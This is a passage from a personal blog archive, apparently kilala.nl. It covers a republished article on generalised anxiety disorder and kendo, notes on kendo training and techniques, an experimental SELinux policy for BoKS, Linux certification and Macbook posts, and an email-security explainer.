An important element to GAD is the vicious cycle or snowball effect. As my therapy workbook describes it (Boeijen, 2007), a sense of anxiety will lead to physical and mental expressions, which in turn will lead to anxious thinking. People with GAD will often fear the effects of anxiety, like fainting or throwing up. These anxious thoughts will create new anxiety, which may worsen the experienced effects, which in turn will feed more anxious thoughts. And so on. Thus, even the smallest worry could start an episode of anxiety, like a snowball rolling down a slope. What may get started with “The fish I had for lunch tasted a bit off.” may end up with “Oh no, I’m having a heart attack!“. If that doesn’t sound logical to you, you’re right! The vicious cycle feeds off of assumptions, worries and thoughts that get strung together. I’ll have two personal examples later.

Treatment of GAD occurs in different ways, often combined:

All sources agree that having proper support structures is imperative for those suffering from any anxiety disorder. Knowing that people understand what you are going through provides a base level of confidence, a foothold if you will. Knowing that these people will be able to catch you if you fall is a big comfort. Having someone to help you dispel illogical and runaway worries is invaluable.

 

My personal experiences with GAD

I am lucky that I suffer from mild GAD and that I have only experienced less than fifteen panic attacks in my life. Where others are harrowed by constant anxiety, I only have trouble in certain situations. I was never diagnosed as such, but in retrospect I have had GAD since my early childhood. At the time, the various symptoms were classified as “school sickness”, irritable bowel syndrome and work-related stress. It was only during a holiday abroad in 2010 that I realized something bigger was at hand, because I had a huge panic attack. I was extremely agitated, could not form a coherent strain of thought and was very argumentative. My conclusion at the time was that “I’m going crazy here, that has to be it. I really don’t want this, I need a pill to take this away right now!“. Oddly, I discounted the whole thing when we arrived home. It took a second, big panic attack for me to accept that I needed to talk to a professional.

This second panic attack progressed as follows:

(Sluyter, 2011)

This illustrates the aforementioned vicious cycle: an innocuous thought (“I wonder how my daughter is doing.“) leads to me worrying that I’m ill, which leads to me worrying about my errand, which gives me stomach cramps, which reinforces my fears about being ill, which makes me nauseous and dizzy, and so on. Worries express themselves, which creates anxiety, which in turn reinforces the earlier worries. It didn’t take my doctor long to refer me to a therapist for Cognitive Behavior Therapy, hereafter “CBT”.

CBT is one of many forms of therapy applicable to anxiety disorders and it is often cited as the most effective one. It is suggested (Rowney, Hermida, Malone, 2012) that CBT achieves “a 78% response rate in panic disorder patients who have committed to 12 to 15 weeks of therapy“. In my personal opinion CBT is successful because it is based on empowerment: the patient is educated about his disorder, showing him that it does not have actual power over him and how he can deal with it. As part of therapy, one learns to recognize the patterns that are involved in the disorder and how to pause or halt these cycles. Patients are given tools to prevent episodes, or to relax during an attack. CBT also relies upon the notion of ‘exposure’ wherein the patient is continuously challenged to overstep his own boundaries. The senses of self-worth and of confidence are improved by realizing that your world isn’t as small as you let your fears make it.

I have learned that the best way to deal with a runaway snowball of thoughts is to dispel the thoughts the moment they occur. Anxious thoughts often start out small and then spiral into nonsensical and unreasonable worries. By tackling each question when it comes, I maintain a feeling of control. Having someone with me to talk over all these worries is very useful, because they are an objective party: they can answer my questions from a grounded perspective. My wife has proven to be indispensable, simply by talking me down from the nonsense in my head.

I first started kendo in January of 2011, half a year before I started CBT. In the week leading up to class I devoured online resources, just so I wouldn’t make a fool of myself. In my mind I had this image that I would be under constant scrutiny as ‘the new guy’. I feared that any misstep would make my integration into the group a lot harder. I read up on basic class structures, on etiquette, on basic terminology and I even did my best to learn a few Japanese phrases in order to thank sensei for his hospitality. Even before taking a single class I already had a mental image of kendo as very strict, disciplined and unforgiving and I was making assumptions and having worries left and right.

I have now practiced kendo for little over two years and I have found that it is a great tool in conquering my anxiety disorder.

  1. I experience kendo as a physically tough activity. Seeing myself break through my limitations forces me to reassess what I am and am not capable of.
  2. The discipline in class feels like a solid wall holding me up and there is a sense of camaraderie. My sempai and sensei will not let me fail and I have a responsibility towards them to tough it out.
  3. Reading and learning about kendo provides me with confidence that I may one day grow into a sempai role.
  4. In kendo one aims for kigurai. As Geoff Salmon-sensei once wrote: “kigurai can mean confidence, grace, the ability to dominate your opponent through strength of character. Kigurai can also be seen as fearlessness or a high level of internal energy. What it is not, is posturing, self congratulating or show-boating“. (Salmon, 2009) Thus kigurai is a very empowering concept!
  5. Kendo is such an engaging activity that it grabs my full attention. Once we have started I no longer have time to worry about anything outside of the dojo. Or as one sempai says: “At tournaments I’m panicking all the way to the shiaijo, but once shiai starts I’m in the zone.

In the dojo I may forget about the outside world, but there are many reasons for anxiety in the training hall as well. For example, after a particularly heavy training I will feel nauseous and lightheaded, which has led to fears of fainting and hyperventilation. I have also worried about sensei’s expectations regarding my performance and attendance to tournaments (“What if I can’t attend? What will he say? Will he reproach me? Will he think less of me?“).

I have also felt anxious about training at our dojo’s main hall, simply because their level is so much higher than mine. I felt that I was imposing on them, that I was burdening them with my bad kendo and that I was making a fool of myself. I finally broke through this by exposure: by attending a national level training and sparring with 7-dan teachers I learned that a huge difference in skill levels is nothing to be ashamed of. All of a sudden I felt equal to my sempai, not as a kendoka but as a human being.

Another great example of exposure was a little trick pulled by the sensei of our main dojo who is aware of my GAD. He had noticed that I allow myself to bow out early if I start to get anxious. So what does he do? We started class using mawari geiko (where the whole group rotates to switch partners) and right before it’s my turn to move to the kakarite side he freezes the group’s rotation. So now I’m stuck in a position where I have responsibility towards my sempai, because without me in this spot the opposing kakarite would need to skip a round of practice! On the one hand I was starting to get anxious from physical exhaustion, but on the other hand I would not allow myself to stop because of this sense of responsibility. His trick worked and I pulled through with stronger confidence.

In the dojo I regularly use two of the tools taught to me during CBT (Boeijen, 2007):

 

GAD in the dojo, for teachers

If one of your students approaches you about their anxiety disorder, please take them seriously. As I explained at the beginning of this article we all feel fear and have doubts, but an actual disorder is another kettle of fish. You will not be expected to be their therapist or their caretaker; all they need is your support. Simply knowing that you’ve got their back is a tremendous help to them!

In issue #5.2 of “Kendo World” magazine, Ben Sheppard in his article “Teaching kendo to children” (Sheppard, 2010) discusses the concept of duty of care. While the legal aspects of the article pertain to minors in certain countries, the general concept can be applied to any student who may require special care. It would be prudent to have some file containing relevant medical and emergency information. This should not be a medical file by any means, but having a list of known risks as well as emergency contact information would be a good idea.

Please realize that you are helping your student cope with their anxieties simply by teaching him kendo. Brad Binder offers (Binder, 2007) that most studies agree that the regular participation in a martial art “cultivates decreases in hostility, anger, and feeling vulnerable to attack. They also lead to more easygoing and warmhearted individuals and increases in self-confidence, self-esteem and self-control.” This may in part be due to the fact that “Asian martial arts have traditionally emphasized self-knowledge, self-improvement, and self-control. Unlike Western sports, Asian martial arts usually: teach self-defense, involve philosophical and ethical teachings to be applied to life, have a high degree of ceremony and ritual, emphasize the integration of mind and body, and have a meditative component.

Should a student indicate that they are having a panic attack, take them aside. Remove them from class, but don’t leave them alone. Have them sit down on the floor and against a wall to prevent injuries should they faint. Guide them through a breathing exercise, like described in the previous paragraph. Reassure them that they are safe and that, while it feels scary, they will be just fine. Help them dispel illogical anxious thoughts. Funny kendo stories are always great as backup material.

Finally, I would suggest that you keep on challenging these students. Continued exposure, by drawing them outside of their comfort zone, will hopefully help them extend beyond their limitations. Having responsibilities and being physically exhausted can lead to anxiety in these people, but being exposed to them in a supportive environment can also be therapeutic.

 

GAD in the dojo, for students

If you have GAD, or another anxiety disorder, I think you should first and foremost extend your support structure into the dojo. Inform your sensei of your issues because he has a need to know. As was discussed in an earlier issue (“Kendo World” #5.2, Sheppard, 2010), dojo staff needs to be aware of medical conditions of their students, for the students’ safety. If there’s a chance of you hyperventilating, fainting or having a panic attack during class, they really need to know.

If you are on medication for your anxieties, please also inform your sensei. They don’t necessarily have to know which medication it is, but they need to be made aware of possible side effects. They should also be able to inform emergency personnel if something ever happens to you.

If you feel comfortable enough to do so, confide in at least one sempai about your anxieties. They don’t have to know everything about it, but talking about your thoughts and worries can help you calm down and put things into perspective. They can also take you aside during class if need be, so the rest of class can proceed undisturbed and so you won’t feel like the center of attention.

Being prepared can give you a lot of peace of mind. I bring a first aid kit with me to the dojo that includes a bag to breathe into (for hyperventilation) and some dextrose tablets. I also look up information about the dojo and tournament venues I will be visiting, to know about amenities, locations and such.

If you aren’t already in therapy, I would sincerely suggest CBT. CBT can help you understand your anxiety disorder and it can provide you with numerous tools to cope. Anxiety is not something you’re easily cured of, but by having the right skills under your belt you can definitely make life a lot easier for yourself!

And let me just say: kudos to you! You’ve already faced your anxieties and crossed your own boundaries by joining a kendo dojo! The toughest, loudest and smelliest martial art I know!

 

Footnotes and references

1: DSM-IV-TR is Diagnostic and Statistical Manual of Mental Disorders, 4th edition, text revision. A document published by the American Psychiatric Association that attempts to standardize the documentation and classification of mental disorders.

 

Binder, B (1999,2007) “Psychosocial Benefits of the Martial Arts: Myth or Reality?”

Boeijen, C. van (2007) “Begeleide Zelfhulp – overwinnen van angstklachten”

Budden, P. (2007) “Buteyko and kendo: my personal experience, 2007”

Buyens, G. (2012) “Glossary related to BUDO and KOBUDO”

Krahulik, M. (2008) “Dear Diary”

Rowney, Hermida, Malone (2012) “Anxiety disorders”

Salmon, G. (2009) “Kigurai”

Sheppard, B (2010) “Teaching kendo to children” – Appeared in Kendo World 5.2

Sluyter, T. (2011) “Dissection of a panic attack”


This article appeared before in Kendo World magazine, vol 6-4, 2013 (eBook and print version on Amazon). The article is republished here with permission of the publisher.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Etiquette reminders

2014-03-13 22:00:00

The past few weeks, we have been paying extra attention to kendo etiquette.  As they say: “Rei ni hajimari, rei ni owari” (kendo begins with rei and ends with rei); without etiquette we might as well just whack each other with sticks.

There are many books and articles available on kendo etiquette and one can talk for hours about it. For now, these are some of the things that we have been reminded of recently.


kilala.nl tags: , ,

View or add comments (curr. 0)

Info on the knee injury

2013-10-19 19:37:00

Good news about my sports injury: I went to see a physio therapist and he agrees with the previous assessment that nothing's actually damaged in my knee. The theory remains as before: I twisted my knee "in a bad way" during kendo and something got pinched. That something is probably my meniscus, a cartilege-like layer that's in between the knee joint. 

In knee injuries you'll often see tearing of the meniscus, which will result in permanent pain and will need to be operated on. That's not the case with me and the doctors think it merely got pinched or hurt. Now, whenever I get pains, that's because the meniscus is being stressed in that same spot. Doc says the pain could go away completely with a few months, or that it could be permanent. It's not dangerous, just annoying. The best way to avoid the pains is to take a good, hard look at my technique in kendo. 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo waza explained

2013-10-04 22:04:00

Disclaimer: this article was written by a mudansha, for other mudansha. While I have learned a lot the past few years, I am by no means a kendo expert.

To many beginning kendoka, the many different waza we practice can become confusing. Good kihon is where it’s at of course, but if you’re asked to practice men-suriage-men, then you’d better know your suriage-men! I’ve always loved this particular explanation at Kendo Guide because of its simple summary of kendo techniques. Their picture gives an easy overview the most important techniques.

The initial division of techniques is into shikake waza and oji waza, respectively offensive and countering techniques. It’s a matter of initiative: who moves first. The Kendo Guide image can be summarized in the following table.

 

shikake (仕掛け) oji (応じ)
renzoku waza (連続) nuki waza (抜き)
harai waza (払い) suriage waza (刷り上げ)
debana waza (出鼻) kaeshi waza (返し)
hiki waza (引き) uchiotoshi waza (撃落シ)
katsugi waza (担ぐ)  
maki waza (巻き)  

 

The Kendo Guide article does a good job of explaining most of these techniques, but I thought we could add upon that. For example…

 

Nuki versus debana

What’s the difference between a nuki kote and a debana kote? On the floor, during keiko, they may feel the same to most beginners. They see sensei square up against a victim, the victim does an attack and sensei whacks him before the attack lands.

The table above should make the biggest difference clear: timing. Nuki kote, or more famously nuki dou, is performed by evading a strike that is already on its way to you. Debana kote and so on, are done before your opponent has even started attacking. Right before he attacks, you do. It’s a matter of sen (å…ˆ), from “sen wo toru“, “to anticipate“.

Where debana waza are “sen no sen” (先の先), nuki waza are “go no sen” (後の先). With the prior you sense that your opponent is going to act and you counteract at the same time. With the latter you can still prevent your opponent’s action from succeeding by blocking and then attacking. Ai-men is also “sen no sen“. Many great teachers have written about the concept of sen, so I will leave it as an exercise for you to read up on the topic. Kendo World magazine has had a few articles on the concept and Salmon-sensei has also written about it.

The remaining oji waza are all “go no sen“: suriagekaeshi and uchiotoshi. Which brings us to…

 

Kaeshi versus suriage

To many beginners, including myself, kaeshi waza and suriage waza can look very much alike in demonstrations: sensei faces his opponent, opponent attacks, sensei whacks the shinai out of the way and the counter attacks. But as before, these techniques are very different despite both being of the “go no sen” persuasion.

Kaeshi waza are demonstrated in kata #4, where shidachi catches uchidachi’sbokken and slides it away along his own bokken with a twist of the wrists. The counter attack is then made from the wrists as well. Suriage technique on the other hand is shown in kata #5 where shidachi counter attacks uchidachi, hitting the bokken out of the way on the upswing. In suriage techniques your own shinai stays on the center line, it does not move sideways.

But wait…

 

Suriage versus harai

Ivan stumbled upon this matter back in 2006: if both suriage and harai waza move your opponent’s shinai out of the way in an upwards or sideways motion, what’s the difference? Well, for starters there is timing: harai waza is shikake waza where you take the initiative, while suriage waza is oji waza i.e. reactive.

In suriage waza, your opponent’s shinai is caught by your upswing straight through the centerline. It is then moved aside by the curvature and the movement of your own shinai, as a setup of your own attack. In harai waza, you hit your opponent’s shinai upwards or downwards out of the way, before starting your own attack.

 

Seme versus osae versus harai

In all three cases you will see the attacker step in, while the defending shinaidisappears off to the side. It’s just that the way in which the shinai moves aside is very different.

In seme waza it is your indomitable spirit that makes your opponent’s kamaecollapse: you move in strongly and he is overwhelmed. That, or you misdirect his attention by putting force on one target, while truly attacking a second target. In osae waza (“pinning techniques“, like in judo) you hold your opponent’s shinai down and prevent it from moving effectively by moving your shinai over it, coming from the side. It is not a strike, push or shove! You’re merely holding him down. Finally, with harai waza, you make a small and strong strike against your opponent’s shinaithus smacking it out of center. This may be done in either direction, left/right, up/down, whichever is more useful to you.

 

One more sen: sen sen no sen

There are three forms of initiative: go no sen (block and act), sen no sen (act simultaneously) and sen sen no sen (act preemptively). All shikake waza, aside from debana, are classed as sen sen no sen: you are acting before your opponent does.

In other budo which traditionally ascribe to a non-antagonistic approach, sen sen no sen is described not as an act of aggression, but as ensuring that your opponent does not get the chance to attack you. Your opponent has already made up his mind to fully attack you, but he has not started yet. And by using sen sen no sen, you are not letting him. For example: an analysis through aikido and an explanation through karate.

 

A graphical summary

Based on all of the preceding, I have come to a new graphical representation of kendo waza. Below are a Venn diagram and a table that show the most important waza and their various characteristics.

Here is a poster of these graphics, that can be printed for the dojo.

 

The leftovers, what hasn’t been discussed yet

I’m told there are more techniques. Maybe we’ll learn about them some day :)

 

Closing words

To end this essay, I would like to quote Salmon-sensei:

The one thing that I am sure was obvious to most people is that in kendo, as in the rest of life, you have to “make it happen”. Shikake waza does not work unless you break your opponents centre and oji waza is effective only if you control your opponents timing and pull him into your counter attack.

We are reminded of this in class, if not every week! What ever you do, you need to have an acting role in it. Simply waiting does not work!

I would like to thank both Heeren-sensei and Salmon-sensei for their explanations through email. They helped me a lot in figuring this stuff out.


kilala.nl tags: , ,

View or add comments (curr. 0)

Running BoKS on SELinux protected servers

2013-10-01 09:00:00

I have moved the project files into GITHub, over here

FoxT Server Control (aka BoKS) is a product that has grown organically over the past two decades. Since its initial inception in the late nineties it has come to support many different platforms, including a few Linux versions. These days, most Linuxen support something called SELinux: Security Enhance Linux. To quote Wikipedia:

"Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides the mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). It is a set of kernel modifications and user-space tools that can be added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement.

Basically, SELinux allows you to very strictly define which files and resources can be accessed under which conditions. It also has a reputation of growing very complicated, very fast. Luckily there are resources like Dan Walsh' excellent blog and the presentation "SELinux for mere mortals".

Because BoKS is a rather complex piece of software, which dozens of binaries and daemons all working together across many different resources, integrating BoKS into SELiinux is very difficult. Thus it hasn't been undertaken yet and thus BoKS will not only require itself to be run outside of SELinux' control, it actually wants to have the software fully disabled. So basically you're disabling one security product, so you can run another product that protects other parts of your network. Not so nice, no?

So I've decided to give it a shot! I'm making an SELinux ruleset that will allow the BoKS client software to operate fully, in order to protect a system alongside SELinux. BoKS replicas and master servers are even more complex, so hopefully those will follow later on. 

I've already made good progress, but there's a lot of work remaining to be done. For now I'm working on a trial-and-error basis, adding rules as they are needed. I'm foregoing the use of sealert for now, as I didn't like the rules it was suggesting. Sure, my method is slower, but at least we'll keep things tidy :)

Over the past few weeks I've been steadily expanding the boks.te file (TE = Type Enforcement, the actual rules):

v0.32 = 466 lines
v0.34 = 423 lines
v0.47 = 631 lines
v0.52 = 661 lines 
v0.60 = 722 lines 
v0.65 = 900+ lines 

Once I have a working version of the boks.te file for the BoKS client, I will post it here. Updates will also be posted on this page.

 

Update 01/10/2013:

Looks like I've got a nominally working version of the BoKS policy ready. The basic tests that I've been performing are working now, however, there's still plenty to do. For starters I'll try to get my hands on automated testing scripts, to run my test domain through its paces. BoKS needs to be triggered to just about every action it can, to ensure that the policy is complete.

 

Update 19/10/2013:

Now that I have an SELinux module that will allow BoKS to boot up and to run in a vanilla environment, I'm ready to show it to the world. Right now I've reached a point where I can no longer work on it by myself and I will need help. My dev and test environment is very limited, both in scale and capabilities and thus I can not test every single feature of BoKS with this module. 

I have already submitted the current version of the module to FoxT, to see what they think. They are also working on a suite of test scripts and tools, that will allow one to automatically run BoKS through its paces which will speed up testing tremendously. 

I would like to remind you that this SELinux module is an experiment and that it is made available as-is. It is absolutely not production-ready and should not be used to run BoKS systems in a live environment. While most of BoKS' basic functions have been tested and verified to work, there are still many features that I cannot test in my current dev environment. I am only running a vanilla BoKS domain. No LDAP servers, no Kerberos, no other fancy features. 

Most of the rules in this file were built by using the various SELinux troubleshooting tools, determining what access needs to be opened up. I've done it all manually, to ensure that we're not opening up too much. So yeah: trial and error. Lots of it. 

This code is made available under the Creative Commons - Attribution-ShareAlike license. See here for full details. You are free to Share (to copy, distribute and transmit the work), to Remix (to adapt the work) and to make commercial use of the work under the following conditions:

So. How to proceed? 

  1. Build a dev/test environment of your own. I'm running CentOS VMs using Parallels Destop on my Macbook. Ensure that they're all up to date and that you include SELinux with the install. Better yet, check the requirements on this page
  2. I've got a BoKS master, replica and client, all version 6.7. However, installing BoKS on CentOS is a bit tricky and requires some trickery.
  3. Download the BoKS SELinux module files
  4. Put them in a working directory, together with a copy of the Makefile from /usr/share/selinux/devel/
  5. Run: make. If you use the files from my download, it should compile without errors. 
  6. Run: semodule -i boks. The first time that you're building the policy you'll need to install the module (-i). After that, with each recompile you will need -u, for update. 
  7. Run: touch /.autorelabel. Then reboot. Your system will change all the BoKS files to their newly defined SELinux types. 
  8. Run: setenforce 1. Then get testing!  Start poking around BoKS and check /var/log/audit/audit.log for any AVC messages that say something's getting blocked. 

I'd love to discuss the workings of the module with you and would also very much appreciate working together with some other people to improve on all of this. 

 

Update 05/11/2014:

Henrik Skoog from Sweden contacted me to submit a bugfix. I'd forgotten to require one important thing in the boks.te file. That's been fixed. Thanks Henrik!

 

Update 11/11/2014:

I have moved the project files into GITHub, over here


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo practice: intense and awesome

2013-09-11 07:25:00

 

The past few weeks have been pretty intensive! Aside from the fact that I need to take a few days off from kendo these weeks (birthdays and such), it's been hard work. Awesome, hard work. They're working us hard in both Almere and in Amstelveen.

Yesterday's class in Amstelveen again put focus on te-no-uchi training and the left hand. After the usual suburi and warming-up, we were again instructed to practice men strikes with motodachi. Five repetitions of fifty shomen, followed by two repetitions of thirty double shomen. Heeren-sensei reminded us that it's not just an exercise to make our arms tired, but that we're really here to practice our left hand. Like before:

When it comes to breathing, don't try to stick to a rhythm of in-and-out breathing that attempts to match your striking pattern. Instead, take a deep breath and keep on breathing out until there's no more. Then breathe in again. Heeren-sensei always tries to get in as many strikes with one breath as possible. 

We were all reminded that breathing should not be done "high" in the lungs, but "low" and from the "hara". In both Japanese and Chinese arts, the "hara" (or the "lower dantian", 下丹田) is said to be the seat of your energy and to be the physical center of gravity of your body. (more here) By breathing from the hara one ensures at least two things:

  1. #mce_temp_url#You are regulating your breathing and getting enough oxygen without hyperventilating.
  2. You are building force in both your body and your kiai/kakegoe.

A way to check that you're breathing right, is to tie your hakama himo pretty tightly around the hara, which ensures that you feel your hakama tightening when breathing in. A very clear difference was presented, between a "high" and a "low" kakegoe. The one produced from the hara was louder, solid and rolls over your opponent.

Our left-hand training continued after seiza, with kirikaeshi interval training and normal kirikaeshi after jigeiko. In both exercises we were told to pay close attention to aite's left hand. It should not be going sideways or wide, but through the center line. "Helicoptering" should be avoided at all costs. Even in kirikaeshi, strikes will be straight for the most part only swerving left or right close to the end. If you feel that aite's left hand is straying, drop your shinai so he will hit your men thus alerting him of the problem.

Twenty minutes of jigeiko were had. Heeren-sensei impressed upon us the importance of practicing the lessons from kihon keiko in jigeiko.

In my case I fought three people and I am happy to see my stamina returning. I did not need to sit down between bouts, but only took a short one minute breather. I feel confident about all three rounds, against Miyahara-sensei, Zicarlo-sempai and Raoul-sempai. With Raoul I took on a student role, letting him coach and warn me extensively regarding my posture and about tension in my muscles. With Machi and Zicarlo, I took a more competitive approach which turned out very well. I tried to maintain a strong kamae and looked them both squarely in the eyes (attempting enzan no metsuke). Whenever I attacked, I tried to stick to the basics: kote-men, oki-men and hayai-men. I also did many hiki-men against Zicarlo. I'm very happy that he congratulated me on my jigeiko, remarking "You don't attack often, but when you do it's good and tidy!" I'm glad that my men strikes often hit the datotsubui.

Recently, Marli has been pressing me to attempt my shodan grading. I've been holding off on that, mostly because of insecurity. I think that, as shodan, one has an exemplary role and I feel that I cannot set a proper example if I have to keep bowing out due to exhaustion. Then again, both Heeren-sensei and Jeroen-sempai reminded me that everyone can tell I'm putting in my best effort and that I keep going despite my exhaustion. Combining all of that with Marli's continued super support and yesterday's class, I now feel more confident about attempting the December grading. I'll have a chat with the NKR people to see if I've met the conditions.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Start of the new kendo season

2013-08-28 06:12:00

Last week saw the start of the 2013/14 kendo season at Renshinjuku dojo. I'm very happy that Heeren-sensei is joining us again after his prolonged absence. On the other hand, I still haven't seen any of the other teachers including Tsuyuguchi-sensei. As per yesterday we moved to our new training hall at Jane Addamslaan, now that the Westend hall is getting decomissioned. 

The first two classes of the season were spent on rebuilding our physical condition after a few weeks of slacking off* and on improving tenouchi (手の内, lit. "the inside of your hand"). Tenouchi is the term used to describe a specific kind of grip or movement, made using your hands and wrists at the moment when a strike connects. Geoff Salmon-sensei has written a lot about it

Heeren-sensei reminded us of the importance of training at home. Once or twice a week in the dojo isn't enough if you want to make real progress! Doing suburi will keep you agile and will help with tenouchi. And making a striking dummy will even let you do basic kihon practice! You can even do suburi inside, but making a suburito from old shinai parts.

After the usual warmup routing, we proceeded to bogu-less exercises. Motodachi receives and counts men strikes on his shinai, which is held in front of his face. Each person needs to do fifty strikes, totaled up to 150 by rotating three times. Last week we also included two times fifty hayai suburi. Heeren-sensei asked us to do these exercises with three things in mind:

  1. The upswing reaches all the way back, tapping your rear.
  2. The upswing has your left hand passing right over your head, almost combing through your hair.
  3. The strike should be made strongly, focusing on the left hand.

These three factors combined help you train tenouchi.

For similar reason we then proceed to interval training, with each couple doing kirikaeshi all 'round the perimeter of the dojo floor. Each person needs to make a minimum of four rounds. Heeren-sensei pointed out the following:

Class is finished with 10-15 minutes of free jigeiko and kirikaeshi.

*: In my case that's three months due to my knee injury. After visiting my GP I stopped kendo a month early. Despite the doctor's expectations it took more than two weeks to get rid of all the pains. More like six to eight. After that the pain was gone, but reappeared after last week's class. I've now bought a knee brace, which appears to be helping a lot. I still need to have a checkup by a physio-therapist.


kilala.nl tags: , ,

View or add comments (curr. 0)

Installing CentOS Linux as default OS on a Macbook

2013-08-12 16:46:00

While preparing for my RHCSA exams, I was in dire need of a Linux playground. At first I could make do with virtual machines running inside Parallels Workstation on my Macbook. But in order to use Michael Jang's practice exams I really needed to run Linux as the main OS (the tests require KVM virtualization). I tried and I tried and I tried but CentOS refused to boot, mostly ending up on the grey Tux / penguin screen of rEFIt

On my final attempt I managed to get it running. I started off with this set of instructions, which got me most of the way. After resyncing the partition table using rEFIt's menu, using the rEFIt boot menu would still send me to the grey penguin screen. But then I found this page! It turns out that rEFIt is only needed in order to tell EFI about the Linux boot partition! Booting is then done using the normal Apple boot loader!

Just hold down the ALT button after powerin up and then choose the disk labeled "Windows". And presto! It works, CentOS boots up just fine. You can simply set it to the default boot disk, provided that you left OS X on there as well (by using the Boot Disk Selector).


kilala.nl tags: , , , ,

View or add comments (curr. 0)

RHCSA achieved

2013-08-12 16:23:00

Huzzah! As I'd hoped, I passed my RHCSA examination this morning. Not only is this a sign that I'm learning good things about Linux, but it also puts me 100% in the green for my continued CISSP-hood: 101 points in domain A and 62 in domain B: 163/120 required points.

I can't be very specific about the examination due to the NDAs, but I can tell a little bit about my personal experience. 

The testing center in Utrecht was pleasant. It's close to the highway and easily accessible because it's not in the middle of town. The amenities are modern and customer-friendly. The testing room itself is decent and the kiosk setup is exactly as shown in Red Hat videos. Personally, I am very happy that RH started with the kiosk exams because of the flexibility it offers. With this new method, you can sit for RHCSA/RHCE/etc almost every day, instead of being bound to a specifc date. 

The kiosk exam comes with continuous, online proctoring meaning that you're not stuck of something goes wrong. In a normal exam situation you'd be able to flag down a proctor and in this case you can simply type in the chatbox to get help. And I did need it on two occasions because something was broken on the RH-side. The online support crew was very helpful and quick to react! They helped me out wonderfully!

I prepared for the test by using two of Michael Jang's books: the RHCSA/RHCE study guide and the RHCSA/RHCE practice exams. If you decide to get those books, I suggest you do NOT go for the e-books because the physical books include DVDs with practice materials. Without going into details of the exams, I found that Jang's books provided me ample preparation for the test. However, it certainly helps to do further investigation on your own, for those subjects that you're not yet familiar with. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Security measures all of us can take - part 3

2013-08-10 22:53:00

Here's another follow-up with regards to security matters I believe everybody should know. It's a short one: Email is not safe.

It has been said that you "don't put anything in an email that you wouldn't want to see on the evening news." It's not even a matter of the NSA/FBI/KGB/superspies. Email really is akin to writing something on a postcard: it's legible to anyone who can get his hands on it. And like with the postal service, many people can get their hands on your email. 

Here is an excelent and long read on the many issues with email. But to sum it up:

  1. In general, emails are transfered and stored unencrypted. Anyone on the same network as you can read them in passing. Anyone managing an email server can read the mails stored on them.
  2. Source/sender information is easily spoofed. There is no way to guarantee that an email actually came from whoever's name is at the top. 

These two problems can be worked around in a few rather technical manners, most of which are not very user friendly. The most important one is to use GPG/PGP, which allows you to encrypt (problem 1) and to digitally sign (problem 2) the emails that you send. It certainly helps, but it introduces a new problem: key exchange. You now need to swap encryption keys with all people with whom you'll want to swap emails. But at least it's something. 

In the mean time:

Want to send me an encrypted email? Here's my public key :)


kilala.nl tags: , ,

View or add comments (curr. 0)

An update on certifications

2013-08-07 22:09:00

Here's a follow-up post to last year's "Confessions of a CISSP slacker".

By the end of last year I was woefully behind on my CPE (continued professional education) requirements, which are needed to retain my CISSP certification. Not only is CISSP a darn hard exam to take, but ISC2 also need you to garner a minimum of 120 study points each three years. In my first two years, I didn't put in much effort meaning I had a trickle of 51 points out of 120. Thus my emergency plan for making it to 120+ points in the span of a year.

All the calculations were made in the linked article and then I set things into motion. My resolve being strengthened by my personal coach I put together a planning for 2013 that would ensure my success. And my hard work has been paying off, because as of tonight I have now achieved the first milestone: the minimum of 80 points in "domain A" (screenshot above). 

The heaviest hitters in obtaining these 29 points are:

The remaining points were garnered by attending online seminars and by perusing a number of issues of InfoSecurity Professional magazine

Next monday I'm scheduled to be taking my RHCSA (Red Hat Certified System Administrator) exam. I've been working hard the past three months and I'm confident that I'll pass the practical exam on my first go. If I do, that's a HUGE load of CPE because all the study time counts towards my CISSP. That would be roughly 20 hours in domain A (security-related) and 60 hours in domain B (generic professional education). And that, my friend, would put me squarely over my minimal requirements! And I haven't even finished all the items on my wishlist :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Public and private parts of this site

2013-07-24 23:38:00

As I wrote earlier I have decided to clamp down on what is publicly published about our lives. This means that >80% of my blog has been turned into a private affair, with only work-related materials still being available to the whole world.

Now that my Macbook has crashed and I need to spend a lot of time waiting for the backups to restore, I have spent roughly eight hours updating my CMS code. It was an interesting learning experience and now this site has a basic login/logout functionality. Logging in will simply let you see the website in all of its original glory.

If I haven't contacted you yet about a username+password and you'd like one, drop me an email.


kilala.nl tags: , , ,

View or add comments (curr. 0)

When FileVault2 fails, it fails hard

2013-07-23 20:54:00

mac os x boot no access screen

For quite a while now I've had my Macbook's boot drive protected using Apple's full-disk encryption, called FileVault2. I've been very pleased with the overall experience and with the fact that the performance hit wasn't too big. All in all it's a nice tool. 

But today i learned that when (if) FileVault2 fails, it fails hard. 

I was on the train to work, fiddling with my Linux VMs and the virtual NICs. Since something wasn't working right, I reckoned I'd reboot the whole laptop and see if that wouldn't clear things up. Heck, my last reboot was at least 20 days ago, so why not?

Well, turns out that my Macbook wouldn't boot anymore. After entering my FileVault password the system would attempt to boot, halting at the "no access" symbol. Not good.

Basically, the boot loader's working and the part that knows my FileVault passwords was also okay. However, poking around with diskutil on the command line quickly showed that the CoreStorage config for my boot drive had gotten corrupted. It showed disk0s2 as being a CoreStorage physical volume, but this was also listed as "failed". There were no logical volumes to be found. Ouchie. This was confirmed by using the diskutil GUI, which greyed out the option to open the encrypted volume.

The only recourse: to delete the failed volume group and to start anew. I'm restoring my backup image as I write this, after which I'll be restoring my homedir through Time Machine, as before. I'm aware that both Filevault and Time Machine can be a bit flaky, so I'm very lucky that they haven't failed on me simultaneously. 

This is all highly ironic, as my Macbook died only a few days before the arrival of my newly ordered Macbook Air. *groan* Now I'm spending a few hours recovering a laptop, which I'll only be using for four more days. Ah well.

This is again a gentle reminder to all you readers to make proper backups. In my case I'm lucky to only lose a few weeks worth of tweaking my Parallels virtual machines, as I chose not to include those with my Time Machine backups (they'd backup multiple gigs every hour). 


kilala.nl tags: , , ,

View or add comments (curr. 0)

KVM, libvirt, polkit-1 and remote management

2013-07-16 22:00:00

